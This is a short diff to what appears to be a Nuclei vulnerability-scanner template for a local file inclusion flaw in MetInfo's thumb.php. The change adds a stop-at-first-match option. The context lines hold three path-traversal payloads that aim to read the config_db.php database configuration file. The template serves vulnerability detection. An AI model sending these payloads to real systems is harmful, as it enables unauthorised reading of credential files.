--- a/vulnerabilities/other/metinfo-lfi.yaml
+++ b/vulnerabilities/other/metinfo-lfi.yaml
@@ -12,7 +12,8 @@ requests:
       - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
       - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
       - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
-
+      
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
